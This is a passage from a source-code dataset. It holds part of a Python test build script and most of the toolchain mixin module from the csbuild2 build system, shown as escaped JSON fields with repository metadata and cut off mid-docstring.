os.path.splitext(os.path.basename(inputFile.filename))[0] + \".second\")\n\t\twith open(outFile, \"w\") as f:\n\t\t\tf.write(str(value))\n\t\t\tf.flush()\n\t\t\tos.fsync(f.fileno())\n\t\treturn outFile\n\nclass Adder(AddDoubles):\n\t\"\"\"\n\tSimple tool that opens multiple doubled files and adds their contents together numerically, outputting a final file.\n\t\"\"\"\n\tinputGroups = {\".second\"}\n\toutputFiles = {\".third\"}\n\n\tdef __init__(self, projectSettings):\n\t\tassert \"qux\" not in projectSettings._settingsDict #pylint: disable=protected-access\n\t\tassert \"{}!qux\".format(id(Adder)) in projectSettings._settingsDict #pylint: disable=protected-access\n\t\tself._qux = projectSettings.get(\"qux\", False)\n\n\t\tAddDoubles.__init__(self, projectSettings)\n\n\t@staticmethod\n\tdef SetQux():\n\t\t\"\"\"\n\t\tSet qux to true, yay testing.\n\t\t\"\"\"\n\t\tglobal quxSet\n\t\tassert quxSet is False\n\t\tquxSet = True\n\t\tcsbuild.currentPlan.SetValue(\"qux\", True)\n\n\t@staticmethod\n\tdef SetQuux():\n\t\t\"\"\"\n\t\tDoes nothing.\n\t\t\"\"\"\n\t\tpass\n\n\tdef RunGroup(self, inputProject, inputFiles):\n\t\tassert self._foo is True\n\t\tassert self._bar is True\n\t\tassert self._qux is True\n\t\tvalue = 0\n\t\tfor inputFile in inputFiles:\n\t\t\twith open(inputFile.filename, \"r\") as f:\n\t\t\t\tvalue += int(f.read())\n\t\toutFile = os.path.join(inputProject.outputDir, inputProject.outputName + \".third\")\n\t\twith open(outFile, \"w\") as 
f:\n\t\t\tf.write(str(value))\n\t\t\tf.flush()\n\t\t\tos.fsync(f.fileno())\n\t\treturn outFile\n\nclass DummyProjectGenerator(Tool):\n\t\"\"\"Dummy project generator\"\"\"\n\tinputGroups = {\".first\"}\n\toutputFiles = {\".proj\"}\n\n\tdef __init__(self, projectSettings):\n\t\tself._projectSettings = projectSettings\n\n\t\tself._foo = projectSettings.get(\"foo\", False)\n\t\tself._bar = projectSettings.get(\"bar\", False)\n\t\tself._qux = projectSettings.get(\"qux\", False)\n\t\tself._quux = projectSettings.get(\"quux\", False)\n\n\t\tTool.__init__(self, projectSettings)\n\n\n\tdef SetupForProject(self, project):\n\t\tprojectSettings = self._projectSettings\n\n\t\t# These checks are done here because information is needed from the project to know what the values should be.\n\t\t# Project settings should NEVER be read outside of __init__ in production code. It will not work as expected.\n\t\tassert \"foo\" not in projectSettings._settingsDict #pylint: disable=protected-access\n\t\tassert \"{}!foo\".format(id(DummyProjectGenerator)) in projectSettings._settingsDict #pylint: disable=protected-access\n\n\t\tif project.name == \"TestProject\":\n\t\t\tif project.toolchainName == \"AddDoubles\":\n\t\t\t\tif project.targetName == \"release\":\n\t\t\t\t\tassert \"bar\" not in projectSettings._settingsDict #pylint: disable=protected-access\n\t\t\t\t\tassert \"{}!bar\".format(id(DummyProjectGenerator)) in projectSettings._settingsDict #pylint: disable=protected-access\n\t\t\t\tassert \"qux\" not in projectSettings._settingsDict #pylint: disable=protected-access\n\t\t\t\tassert \"{}!qux\".format(id(DummyProjectGenerator)) in projectSettings._settingsDict #pylint: disable=protected-access\n\t\t\t\tassert \"quux\" not in projectSettings._settingsDict #pylint: disable=protected-access\n\t\t\t\tassert \"{}!quux\".format(id(DummyProjectGenerator)) in projectSettings._settingsDict #pylint: disable=protected-access\n\n\t@staticmethod\n\tdef SetQuux():\n\t\t\"\"\"\n\t\tSet quux to true, yay testing.\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"quux\", True)\n\n\t@staticmethod\n\tdef SetFoo():\n\t\t\"\"\"\n\t\tSet foo to true, yay testing.\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"foo\", True)\n\n\t@staticmethod\n\tdef SetQux():\n\t\t\"\"\"\n\t\tSet qux to true, yay testing.\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"qux\", True)\n\n\t@staticmethod\n\tdef SetBar():\n\t\t\"\"\"\n\t\tSet bar to true, yay testing.\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"bar\", True)\n\n\t@property\n\tdef foo(self): # pylint: disable=blacklisted-name\n\t\t\"\"\"Get foo\"\"\"\n\t\treturn self._foo\n\n\t@property\n\tdef bar(self): # pylint: disable=blacklisted-name\n\t\t\"\"\"Get bar\"\"\"\n\t\treturn self._bar\n\n\t@property\n\tdef qux(self):\n\t\t\"\"\"Get qux\"\"\"\n\t\treturn self._qux\n\n\t@property\n\tdef quux(self):\n\t\t\"\"\"Get quux\"\"\"\n\t\treturn self._quux\n\n\tdef RunGroup(self, inputProject, inputFiles):\n\t\tassert self._foo is True\n\t\tassert self._bar is (inputProject.targetName == \"release\")\n\t\tassert self._qux is True\n\t\tassert self._quux is True\n\t\toutStr = \"\\n\".join([inputFile.filename for inputFile in inputFiles])\n\t\toutFile = os.path.join(csbuild.GetSolutionPath(), inputProject.outputName + \"_\" + inputProject.targetName + \".proj\")\n\t\twith open(outFile, \"w\") as f:\n\t\t\tf.write(outStr)\n\t\t\tf.flush()\n\t\t\tos.fsync(f.fileno())\n\t\treturn outFile\n\nclass DummySolutionGenerator(SolutionGenerator):\n\t\"\"\"Dummy solution generator\"\"\"\n\n\t@staticmethod\n\tdef 
GenerateSolution(outputDir, solutionName, projects):\n\t\t\"\"\"\n\t\tGenerates the actual solution file from the projects generated by each tool.\n\t\tThe actual project objects are passed to the solution generator, allowing the generator to gather information\n\t\tabout the projects themselves, as well as outputs returned from the project generator tools\n\t\t(via project.inputFiles[\".ext\"], which is a list of csbuild._build.input_file.InputFile objects) and\n\t\tdata on the tools (via calling methods and properties on the tool through project.toolchain.Tool(ToolType).Method()\n\t\tor project.toolchain.Tool(ToolType).property)\n\n\t\t:param outputDir: Top-level directory all solution files should be placed into\n\t\t:type outputDir: str\n\t\t:param solutionName: Desired base name of the solution\n\t\t:type solutionName: str\n\t\t:param projects: Set of all built projects\n\t\t:type projects: list[csbuild._build.project.Project]\n\t\t\"\"\"\n\t\toutStr = \"\"\n\t\tfor proj in projects:\n\t\t\t# I do not know why pylint thinks inputFile is a str.\n\t\t\toutStr += \"\\n\".join(sorted([inputFile.filename for inputFile in proj.inputFiles[\".proj\"]])) # pylint: disable=no-member\n\t\t\tprint(proj.toolchain.Tool(DummyProjectGenerator))\n\t\t\tprint(proj.toolchain.Tool(DummyProjectGenerator).foo)\n\t\t\tassert proj.toolchain.Tool(DummyProjectGenerator).foo is True\n\t\t\tassert proj.toolchain.Tool(DummyProjectGenerator).bar is (proj.targetName == \"release\")\n\t\t\tassert proj.toolchain.Tool(DummyProjectGenerator).qux is True\n\t\t\tassert proj.toolchain.Tool(DummyProjectGenerator).quux is True\n\n\t\toutFile = os.path.join(outputDir, solutionName + \".sln\")\n\t\twith open(outFile, \"w\") as f:\n\t\t\tf.write(outStr)\n\t\t\tf.flush()\n\t\t\tos.fsync(f.fileno())\n\ncsbuild.RegisterToolchain(\"AddDoubles\", \"\", Doubler)\ncsbuild.RegisterProjectGenerator(\"DummyGenerator\", [DummyProjectGenerator], DummySolutionGenerator)\ncsbuild.SetDefaultToolchain(\"AddDoubles\")\n\ncsbuild.SetFoo()\n\nwith csbuild.Project(\"TestProject\", \".\"):\n\twith csbuild.Toolchain(\"AddDoubles\"):\n\t\tcsbuild.AddTool(Adder)\n\t\tcsbuild.SetQux()\n\t\twith csbuild.Target(\"release\"):\n\t\t\tcsbuild.SetBar()\n\t\tcsbuild.Tool(Adder).SetQuux()\n\tcsbuild.SetOutput(\"Foo\", csbuild.ProjectType.Application)\n" }, { "alpha_fraction": 0.6746160387992859, "alphanum_fraction": 0.6824505925178528, "avg_line_length": 34.89369583129883, "blob_id": "b8b9a9b6077fd459ba6908bee13088a9ce54d67d", "content_id": "1eb255a28de269623ec149374b57db7d0f84dc96", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 58076, "license_type": "no_license", "max_line_length": 160, "num_lines": 1618, "path": "/csbuild/toolchain/toolchain.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. 
Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: toolchain\n\t:synopsis: Mixin class to join tools together\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport contextlib\nimport threading\nimport sys\nimport types\n\nfrom .._utils import shared_globals\nfrom . import Tool as ToolClass, CompileChecker\nfrom .._utils import PlatformString, ordered_set\nfrom .._utils.decorators import TypeChecked\nfrom .._utils.string_abc import String\nfrom .._testing import testcase\nfrom .. import perf_timer\n\ncurrentToolId = None\n\nif sys.version_info[0] >= 3:\n\t_typeType = type\n\t_classType = type\nelse:\n\t# pylint: disable=invalid-name\n\t_typeType = types.TypeType\n\t_classType = types.ClassType\n\nstaticInitsRun = set()\noverloadedStaticInits = set()\n\nclass InvalidFunctionCall(Exception):\n\t\"\"\"\n\tException indicating an invalid function call.\n\t\"\"\"\n\tpass\n\nclass Toolchain(object):\n\t\"\"\"\n\tCreates a toolchain mixin class from the given list of classes.\n\tThis mixin class has the following special behaviors:\n\n\t* If two classes both inherit from the same class, variables initialized in the base class's __init__ will be shared\n\t between all subclasses\n\t* Private functions and data members are specific to the class they're defined in, even if they share a name in\n\t two different classes - the code will intelligently call the correct (intended) function based on the location\n\t it's called from\n\t* Public functions will be called as a group - all tools that define a certain function will have that function\n\t called when the toolchain's function of that name is called.\n\n\t:param projectSettings: Settings to initialize tool classes with\n\t:type projectSettings: dict\n\t:param classes: list of Tool classes\n\t:type classes: class inherited from Tool\n\t:param kwargs: Optional arguments:\n\t\t*runInit* to disable initialization so that static methods may be called\n\t\ton platforms where full initialization may not work.\n\t\t*checkers* to provide a mapping of extension to CompileChecker instance\n\t:type kwargs: bool for *runInit*; dict for *checkers*\n\t:return: generated Toolchain class\n\t:rtype: Toolchain\n\t\"\"\"\n\tdef __new__(cls, projectSettings, *classes, **kwargs):\n\t\twith perf_timer.PerfTimer(\"Toolchain creation\"):\n\t\t\tfor cls in classes:\n\t\t\t\tassert issubclass(cls, ToolClass), \"Toolchains must be composed only of classes that inherit from Tool\"\n
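\n\t\t\t# Illustrative composition (hypothetical tool names): Toolchain(settings, Compiler, Linker)\n\t\t\t# yields one object whose shared public methods fan out to every tool defining them, while\n\t\t\t# private members stay scoped to the tool that declared them, as the class docstring describes.\n\n\t\t\t# 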
Python 2 compatibility... python 3 allows keyword arguments after *args, but python 2 doesn't\n\t\t\trunInit = kwargs.pop(\"runInit\", True)\n\t\t\tcheckers = kwargs.pop(\"checkers\", {})\n\t\t\tassert not kwargs, \"Unsupported arguments to toolchain init: {}\".format(kwargs.keys())\n\t\t\tdefaultChecker = CompileChecker()\n\n\t\t\twith perf_timer.PerfTimer(\"Local data init\"):\n\t\t\t\t# Keep track of some state data...\n\t\t\t\tclass _classTrackrClass(object):\n\t\t\t\t\tdef __init__(self):\n\t\t\t\t\t\t# List of classes that have had __init__ called on them.\n\t\t\t\t\t\t# Since base class data is shared, we don't want to initialize them more than once\n\t\t\t\t\t\tself.initialized = set()\n\n\t\t\t\t\t\t# List of inits that are already overloaded so we don't wrap them multiple times\n\t\t\t\t\t\tself.overloadedInits = set()\n\n\t\t\t\t\t\t# Mutable list of classes\n\t\t\t\t\t\tself.classes = ordered_set.OrderedSet()\n\n\t\t\t\t\t\t# Mutable list of bases\n\t\t\t\t\t\tself.bases = ordered_set.OrderedSet()\n\n\t\t\t\t\t\t# List of paths by which files can go through tools at various starting points.\n\t\t\t\t\t\tself.paths = {}\n\n\t\t\t\t\t\t# List of reachable extensions given currently active or pending tools\n\t\t\t\t\t\tself.reachability = {}\n\n\t\t\t\t\t\t# List of null input tools that have been processed\n\t\t\t\t\t\tself.activeClasses = ordered_set.OrderedSet()\n\n\t\t\t\t\t\t# List of compile checkers\n\t\t\t\t\t\tself.checkers = {}\n\n\t\t\t\t_classTrackr = _classTrackrClass()\n\t\t\t\t_classTrackr.checkers = checkers\n\n\t\t\t\t_threadSafeClassTrackr = threading.local()\n\n\t\t\t\t# The last class to have a public function called on it\n\t\t\t\t# This is used to resolve private function calls and private member variable access - only\n\t\t\t\t# those elements that exist on this class or its bases will be visible\n\t\t\t\t_threadSafeClassTrackr.lastClass = None\n\n\t\t\t\t# Limited class lookup table. 
When non-empty, only classes in this set will be\n\t\t\t\t# visible when performing member lookups\n\t\t\t\t_threadSafeClassTrackr.limit = ordered_set.OrderedSet()\n\n\t\t\t\tdef _getLastClass():\n\t\t\t\t\tif hasattr(_threadSafeClassTrackr, \"lastClass\"):\n\t\t\t\t\t\treturn _threadSafeClassTrackr.lastClass\n\t\t\t\t\treturn None\n\n\t\t\t\tdef _getLimit():\n\t\t\t\t\tif hasattr(_threadSafeClassTrackr, \"limit\"):\n\t\t\t\t\t\treturn _threadSafeClassTrackr.limit\n\t\t\t\t\treturn ordered_set.OrderedSet()\n\n\t\t\t\[email protected]\n\t\t\t\tdef Use(cls): # pylint: disable=missing-yield-doc,missing-yield-type-doc\n\t\t\t\t\t\"\"\"\n\t\t\t\t\tSimple context manager to simplify scope management for the class tracker\n\t\t\t\t\t:param cls: The class to manage, or 'self' to access self variables\n\t\t\t\t\t:type cls: class, or Toolchain instance\n\t\t\t\t\t\"\"\"\n\t\t\t\t\tglobal currentToolId\n\t\t\t\t\tlastToolId = currentToolId\n\t\t\t\t\tcurrentToolId = [id(x) for x in cls.mro()]\n\t\t\t\t\toldClass = _getLastClass()\n\t\t\t\t\t_threadSafeClassTrackr.lastClass = cls\n\t\t\t\t\ttry:\n\t\t\t\t\t\tyield\n\t\t\t\t\tfinally:\n\t\t\t\t\t\t_threadSafeClassTrackr.lastClass = oldClass\n\t\t\t\t\t\tcurrentToolId = lastToolId\n\n\t\t\t\t# Replace each class's __init__ function with one that will prevent double-init\n\t\t\t\t# and will ensure that _threadSafeClassTrackr.lastClass is set properly so that variables\n\t\t\t\t# initialize with the correct visibility\n\t\t\t\tdef _setinit(base):\n\t\t\t\t\t# Use a variable on the function to prevent us from wrapping this over and over\n\t\t\t\t\tif base.__init__ not in _classTrackr.overloadedInits:\n\t\t\t\t\t\toldinit = base.__init__\n\n\t\t\t\t\t\tfor superbase in list(base.mro())[1:]:\n\t\t\t\t\t\t\tif superbase is object:\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\tif hasattr(oldinit, '__func__'):\n\t\t\t\t\t\t\t\tif hasattr(superbase.__init__, '__func__') and oldinit.__func__ is superbase.__init__.__func__:\n\t\t\t\t\t\t\t\t\tbase.__oldInit__ = oldinit\n\t\t\t\t\t\t\t\t\treturn\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tif not hasattr(superbase.__init__, '__func__') and oldinit is superbase.__init__:\n\t\t\t\t\t\t\t\t\tbase.__oldInit__ = oldinit\n\t\t\t\t\t\t\t\t\treturn\n\n\t\t\t\t\t\tdef _initwrap(self, *args, **kwargs):\n\t\t\t\t\t\t\t# Don't re-init if already initialized\n\t\t\t\t\t\t\tif base not in _classTrackr.initialized:\n\t\t\t\t\t\t\t\t_classTrackr.initialized.add(base)\n\t\t\t\t\t\t\t\t# Track the current class for __setattr__\n\t\t\t\t\t\t\t\twith Use(base):\n\t\t\t\t\t\t\t\t\toldinit(self, *args, **kwargs)\n\n\t\t\t\t\t\t# Replace existing init and set the memoization value\n\t\t\t\t\t\tbase.__init__ = _initwrap\n\t\t\t\t\t\tbase.__oldInit__ = oldinit\n\t\t\t\t\t\t_classTrackr.overloadedInits.add(base.__init__)\n\t\t\t\t\tif base.__static_init__ not in overloadedStaticInits:\n\t\t\t\t\t\toldstaticinit = base.__static_init__\n\n\t\t\t\t\t\tfor superbase in list(base.mro())[1:]:\n\t\t\t\t\t\t\tif superbase is object:\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\tif oldstaticinit is superbase.__static_init__:\n\t\t\t\t\t\t\t\treturn\n\n\t\t\t\t\t\t@staticmethod\n\t\t\t\t\t\tdef _staticinitwrap(*args, **kwargs):\n\t\t\t\t\t\t\t# Don't re-init if already initialized\n\t\t\t\t\t\t\tif oldstaticinit not in staticInitsRun:\n\t\t\t\t\t\t\t\tstaticInitsRun.add(oldstaticinit)\n\t\t\t\t\t\t\t\toldstaticinit(*args, **kwargs)\n\t\t\t\t\t\tbase.__static_init__ = _staticinitwrap\n\t\t\t\t\t\tbase.__old_static_init__ = 
oldstaticinit\n\t\t\t\t\t\tbase.__old_static_init_owner__ = base\n\t\t\t\t\t\toverloadedStaticInits.add(base.__static_init__)\n\n\t\t\t# Collect a list of all the base classes\n\t\t\tfor cls in classes:\n\t\t\t\tassert (cls.inputFiles is None or cls.inputFiles or cls.inputGroups or cls.crossProjectInputGroups), \"Tool {} has no inputs set\".format(cls.__name__)\n\t\t\t\tassert cls.outputFiles, \"Tool {} has no outputs set\".format(cls.__name__)\n\t\t\t\t# mro() - \"method resolution order\", which happens to also be a list of all classes in the inheritance\n\t\t\t\t# tree, including the class itself (but we only care about its base classes\n\t\t\t\tfor base in cls.mro():\n\t\t\t\t\tif base is cls:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t# Replace the base class's __init__ so we can track members properly\n\t\t\t\t\tif runInit:\n\t\t\t\t\t\t_setinit(base)\n\t\t\t\t\tif base is ToolClass:\n\t\t\t\t\t\tbreak\n\t\t\t\t\t_classTrackr.bases.add(base)\n\n\t\t\t# Create paths for each tool, showing the total path a file will take from this tool to its final output\n\t\t\tfor cls in classes:\n\t\t\t\tneedAnotherPass = True\n\t\t\t\tpath = ordered_set.OrderedSet()\n\t\t\t\twhile needAnotherPass:\n\t\t\t\t\tneedAnotherPass = False\n\t\t\t\t\toutputs = set(cls.outputFiles)\n\t\t\t\t\tfor cls2 in classes:\n\t\t\t\t\t\tif cls2 is cls:\n\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\tif cls2 in path:\n\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\tif cls2.inputFiles is not None:\n\t\t\t\t\t\t\tfor inputFile in cls2.inputFiles:\n\t\t\t\t\t\t\t\tif inputFile in outputs:\n\t\t\t\t\t\t\t\t\tpath.add(cls2)\n\t\t\t\t\t\t\t\t\toutputs.update(cls2.outputFiles)\n\t\t\t\t\t\t\t\t\tneedAnotherPass = True\n\t\t\t\t\t\tfor inputFile in cls2.inputGroups:\n\t\t\t\t\t\t\tif inputFile in outputs:\n\t\t\t\t\t\t\t\tpath.add(cls2)\n\t\t\t\t\t\t\t\toutputs.update(cls2.outputFiles)\n\t\t\t\t\t\t\t\tneedAnotherPass = True\n\t\t\t\t_classTrackr.paths[cls] = path\n\n\n\t\t\t_classTrackr.classes = ordered_set.OrderedSet(classes)\n\t\t\t_classTrackr.activeClasses = ordered_set.OrderedSet(classes)\n\n\t\t\t# Set up a map of class to member variable dict\n\t\t\t# All member variables will be stored here instead of in the class's __dict__\n\t\t\t# This is what allows for both sharing of base class values, and separation of\n\t\t\t# derived class values that share the same name, so they don't overwrite each other\n\t\t\tclassValues = {cls : {} for cls in _classTrackr.classes | _classTrackr.bases}\n\n\t\t\twith perf_timer.PerfTimer(\"Template class construction\"):\n\t\t\t\t# Create a class so that we can call methods on that class\n\t\t\t\tclass LimitView(object):\n\t\t\t\t\t\"\"\"Represents a limited view into a toolchain\"\"\"\n\t\t\t\t\t# The constructor takes the list of tools to limit to - i.e., toolchain.Tool(SomeClass, OtherClass)\n\t\t\t\t\tdef __init__(self, obj, *tools):\n\t\t\t\t\t\tself.obj = obj\n\n\t\t\t\t\t\t# Ensure resolution order of these tools is the same as the classes themselves\n\t\t\t\t\t\tif len(tools) > 1:\n\t\t\t\t\t\t\tself.tools = ordered_set.OrderedSet()\n\t\t\t\t\t\t\tfor cls in classes:\n\t\t\t\t\t\t\t\tfor tool in tools:\n\t\t\t\t\t\t\t\t\tif cls == tool or issubclass(cls, tool):\n\t\t\t\t\t\t\t\t\t\tself.tools.add(tool)\n\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\tif len(tools) == len(self.tools):\n\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tself.tools = ordered_set.OrderedSet(tools)\n\n\t\t\t\t\t# When asked for an attribute, set the class tracker's limit set and then retrieve the attribute\n\t\t\t\t\t# from the 
toolchain class (this class) that generated the LimitView. Resolution will be limited\n\t\t\t\t\t# to the tools provided above.\n\t\t\t\t\tdef __getattr__(self, item):\n\t\t\t\t\t\t_threadSafeClassTrackr.limit = self.tools\n\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tval = getattr(self.obj, item)\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\t_threadSafeClassTrackr.limit = ordered_set.OrderedSet()\n\t\t\t\t\t\t\traise\n\n\t\t\t\t\t\tdef _limit(*args, **kwargs):\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\treturn val(*args, **kwargs)\n\t\t\t\t\t\t\tfinally:\n\t\t\t\t\t\t\t\t_threadSafeClassTrackr.limit = ordered_set.OrderedSet()\n\n\t\t\t\t\t\t_limit.__name__ = item\n\n\t\t\t\t\t\tif isinstance(val, (types.MethodType, types.FunctionType)):\n\t\t\t\t\t\t\treturn _limit\n\n\t\t\t\t\t\t_threadSafeClassTrackr.limit = ordered_set.OrderedSet()\n\t\t\t\t\t\treturn val\n\n\t\t\t\tclass ReadOnlySettingsView(object):\n\t\t\t\t\t\"\"\"\n\t\t\t\t\tRepresents a read-only, class-scoped view into a project's settings dictionary.\n\t\t\t\t\t:param settingsDict: Settings\n\t\t\t\t\t:type settingsDict: dict\n\t\t\t\t\t\"\"\"\n\t\t\t\t\t# pylint: disable=invalid-name\n\t\t\t\t\t# Names here are to match dict interface\n\t\t\t\t\tdef __init__(self, settingsDict):\n\t\t\t\t\t\tself._settingsDict = settingsDict\n\n\t\t\t\t\tdef __getitem__(self, item):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tGet item from the dictionary\n\t\t\t\t\t\t:param item: the key to search for\n\t\t\t\t\t\t:type item: any\n\t\t\t\t\t\t:return: Whatever was placed in the settings dictionary\n\t\t\t\t\t\t:rtype: any\n\t\t\t\t\t\t:raises KeyError: if the key is not present in the dictionary within the calling class's scope\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tfor toolId in currentToolId:\n\t\t\t\t\t\t\tkey = \"{}!{}\".format(toolId, item)\n\t\t\t\t\t\t\tif key in self._settingsDict:\n\t\t\t\t\t\t\t\treturn self._settingsDict[key]\n\t\t\t\t\t\traise KeyError(item)\n\n\t\t\t\t\tdef items(self):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tIterate the key,value tuple pairs in the dictionary\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tfor key, value in self._settingsDict.items():\n\t\t\t\t\t\t\tfor toolId in currentToolId:\n\t\t\t\t\t\t\t\tif key.startswith(\"{}!\".format(toolId)):\n\t\t\t\t\t\t\t\t\tyield key.split(\"!\", 1)[1], value\n\n\t\t\t\t\tdef keys(self):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tIterate the keys in the dictionary\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tfor key in self._settingsDict.keys():\n\t\t\t\t\t\t\tfor toolId in currentToolId:\n\t\t\t\t\t\t\t\tif key.startswith(\"{}!\".format(toolId)):\n\t\t\t\t\t\t\t\t\tyield key.split(\"!\", 1)[1]\n\n\t\t\t\t\tdef __iter__(self):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tIterate the keys in the dictionary\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tfor key in self._settingsDict.keys():\n\t\t\t\t\t\t\tfor toolId in currentToolId:\n\t\t\t\t\t\t\t\tif key.startswith(\"{}!\".format(toolId)):\n\t\t\t\t\t\t\t\t\tyield key.split(\"!\", 1)[1]\n\n\t\t\t\t\tdef __contains__(self, item):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tCheck if a key is in the dictionary\n\t\t\t\t\t\t:param item: key to check\n\t\t\t\t\t\t:type item: any\n\t\t\t\t\t\t:return: true if in, false otherwise\n\t\t\t\t\t\t:rtype: bool\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tfor toolId in currentToolId:\n\t\t\t\t\t\t\tkey = \"{}!{}\".format(toolId, item)\n\t\t\t\t\t\t\tif key in self._settingsDict:\n\t\t\t\t\t\t\t\treturn True\n\t\t\t\t\t\treturn False\n
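\n\t\t\t\t\t# Note: settings are stored under namespaced keys of the form \"<toolId>!<name>\" (see\n\t\t\t\t\t# __getitem__ above); currentToolId holds the ids of the active tool's MRO, so a derived\n\t\t\t\t\t# tool also sees values that were set on its base classes.\n\n\t\t\t\t\tdef get(self, item, default):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tGet the item from the dict. 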
If not present, return default\n\t\t\t\t\t\t:param item: Key to search for\n\t\t\t\t\t\t:type item: any\n\t\t\t\t\t\t:param default: default value to return\n\t\t\t\t\t\t:type default: any\n\t\t\t\t\t\t:return: the value, or default\n\t\t\t\t\t\t:rtype: any\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tfor toolId in currentToolId:\n\t\t\t\t\t\t\tkey = \"{}!{}\".format(toolId, item)\n\t\t\t\t\t\t\tif key in self._settingsDict:\n\t\t\t\t\t\t\t\treturn self._settingsDict[key]\n\t\t\t\t\t\treturn default\n\n\t\t\t\t\tdef values(self):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tIterate the values in the dictionary\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tfor key, value in self._settingsDict.items():\n\t\t\t\t\t\t\tfor toolId in currentToolId:\n\t\t\t\t\t\t\t\tif key.startswith(\"{}!\".format(toolId)):\n\t\t\t\t\t\t\t\t\tyield value\n\n\t\t\t\t\tdef __len__(self):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tGet number of items in the dictionary\n\t\t\t\t\t\t:return: count of items\n\t\t\t\t\t\t:rtype: int\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tlength = 0\n\t\t\t\t\t\tfor key in self._settingsDict.keys():\n\t\t\t\t\t\t\tfor toolId in currentToolId:\n\t\t\t\t\t\t\t\tif key.startswith(\"{}!\".format(toolId)):\n\t\t\t\t\t\t\t\t\tlength += 1\n\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\treturn length\n\n\t\t\t\tclass ToolchainTemplate(object):\n\t\t\t\t\t\"\"\"\n\t\t\t\t\tTemplate class that provides the methods for the toolchain class.\n\t\t\t\t\tThis class is never instantiated, its methods are just copied to the dynamically-created toolchain class below\n\t\t\t\t\tThis is a hacky hack to get around the fact that python2 doesn't support the syntax\n\t\t\t\t\tclass Toolchain(*classes)\n\t\t\t\t\tto give the class dynamically-created base classes (which is required because they need to all share the\n\t\t\t\t\tsame, and type-appropriate, self object)\n\t\t\t\t\t\"\"\"\n\t\t\t\t\tdef __init__(self):\n\t\t\t\t\t\tif runInit:\n\t\t\t\t\t\t\t# Initialize all dynamically created bases.\n\t\t\t\t\t\t\tfor cls in _classTrackr.classes:\n\t\t\t\t\t\t\t\tactualStaticInitMethod = cls.__static_init__\n\t\t\t\t\t\t\t\tif hasattr(cls, \"__old_static_init__\") and cls.__old_static_init_owner__ is cls:\n\t\t\t\t\t\t\t\t\tactualStaticInitMethod = cls.__old_static_init__\n\t\t\t\t\t\t\t\tif actualStaticInitMethod not in staticInitsRun:\n\t\t\t\t\t\t\t\t\tcls.__static_init__()\n\t\t\t\t\t\t\t\twith Use(cls):\n\t\t\t\t\t\t\t\t\tcls.__init__(self, ReadOnlySettingsView(projectSettings))\n\t\t\t\t\t\t\t_threadSafeClassTrackr.lastClass = None\n\n\t\t\t\t\t\t\tfor base in _classTrackr.bases:\n\t\t\t\t\t\t\t\tbase.__init__ = base.__oldInit__\n\t\t\t\t\t\t\t\tdel base.__oldInit__\n\t\t\t\t\t\t\t\t#base.__static_init__ = base.__old_static_init__\n\t\t\t\t\t\t\t\t#del base.__old_static_init__\n\n\t\t\t\t\t@TypeChecked(tool=(_classType, _typeType))\n\t\t\t\t\tdef Use(self, tool):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tEnter a tool context, must be called before calling any functions that were directly pulled from the tool.\n\t\t\t\t\t\ti.e.,::\n\t\t\t\t\t\t\twith toolchain.Use(tool):\n\t\t\t\t\t\t\t\ttool.Run(toolchain, *args)\n\t\t\t\t\t\t:param 